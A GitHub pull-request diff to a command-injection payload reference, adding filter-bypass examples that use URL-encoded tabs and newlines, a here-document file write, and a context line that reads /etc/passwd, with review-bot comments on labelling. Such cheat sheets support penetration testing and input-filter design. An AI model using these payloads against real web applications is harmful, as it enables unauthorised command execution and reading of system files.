Merge pull request swisskyrepo#475 from int0x80/cmd-inj-spaces
Command Injection space alternatives
swisskyrepo authored Jan 15, 2022
2 parents f23412d + 171a6f2 commit c89976d
Showing 1 changed file with 18 additions and 0 deletions.
18 changes: 18 additions & 0 deletions Command Injection/README.md
Expand Up @@ -96,6 +96,16 @@ Commands execution without spaces, $ or { } - Linux (Bash only)
IFS=,;`cat<<<uname,-a`
```

Tabs work as separators in web apps where spaces are removed.

```powershell
;ls%09-al%09/home
drwxr-xr-x 4 root root 4096 Jan 10 13:34 .
drwxr-xr-x 18 root root 4096 Jan 10 13:33 ..
drwx------ 2 root root 16384 Jan 10 13:31 lost+found
drwxr-xr-x 4 test test 4096 Jan 13 08:30 test
```

Works on Windows only.

```powershell
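Review bot: The block added under "Tabs work as separators in web apps where spaces are removed." is fenced as `powershell`, but `;ls%09-al%09/home` and the listing beneath it are a Linux command and its output, and the block sits directly above "Works on Windows only.", so the platform is easy to misread. Suggest a neutral or `bash` fence and a visible split between the submitted value and the four `drwx...` output lines. The sentence should also state that `%09` is the URL-encoded horizontal tab, decoded before the value reaches the shell, so that a reader maintaining an input filter sees the actual point: stripping only the space character leaves other word separators in place.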
Expand All @@ -109,6 +119,14 @@ ping%PROGRAMFILES:~10,-5%IP
something%0Acat%20/etc/passwd
```

You can also write files.

```powershell
;cat>/tmp/hi<<EOF%0ahello%0aEOF
;cat</tmp/hi
hello
```

### Bypass characters filter via hex encoding

Linux
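Review bot: "You can also write files." does not say which platform or shell it applies to, and the new block is again fenced as `powershell` even though it uses `cat`, `/tmp/hi` and a `<<EOF` here-document; the nearest visible context in the hunk header is the Windows `ping%PROGRAMFILES:~10,-5%IP` line. Suggest naming it as a Linux shell here-document with `%0a` as the URL-encoded newline, and marking `hello` as the output of `;cat</tmp/hi` rather than a third input line. The added lines use lowercase `%0a` while the context line `something%0Acat%20/etc/passwd` uses `%0A`; pick one casing for the file.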